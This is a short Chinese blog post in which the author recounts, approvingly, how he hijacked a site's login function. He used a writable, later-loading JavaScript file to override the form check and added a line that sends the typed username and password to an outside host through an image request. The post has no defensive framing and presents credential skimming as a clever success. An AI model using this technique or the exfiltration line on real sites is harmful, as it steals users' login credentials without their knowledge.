标签:
另类在哪呢?另类在页面自带一个外部js,劫持login这个function,而我恰能修改它下面的一个js(唯一一个,而且是废弃不用了的)。
那个js里面的代码用了jQuery,把之后再加载的网页自身的function login给替换为自己的function。
=========
我的权限:可修改那个外部js下面的一个js,命运啊,偏偏我能那么做。
--------------------------
我js很菜的,现在这情况,居然也能发挥一下了,我把我能控制的js内容完全copy了那个外部js,
由于我的js比那外部js后加载,于是我在里头修改后的函数才是真被调用的那一个。
记得吗?那个外部js劫持了网页的login这个function(暂且叫用自己的A函数替换了那个login函数,人家这么做有一些其他目的,倒方便我照抄了),这个function是用来检查表单用户名密码填了没有的.
太好了,现在我的js的A函数才是真正替代了login函数的,于是A函数里加一句(new Image()).src=‘http://xxx"+document.loginForm.yh+document.loginForm.mm;
oh,yeh,点击登录按钮后,用户名密码就悄悄发来了。
标签:
原文地址:http://blog.csdn.net/u010211892/article/details/43521813
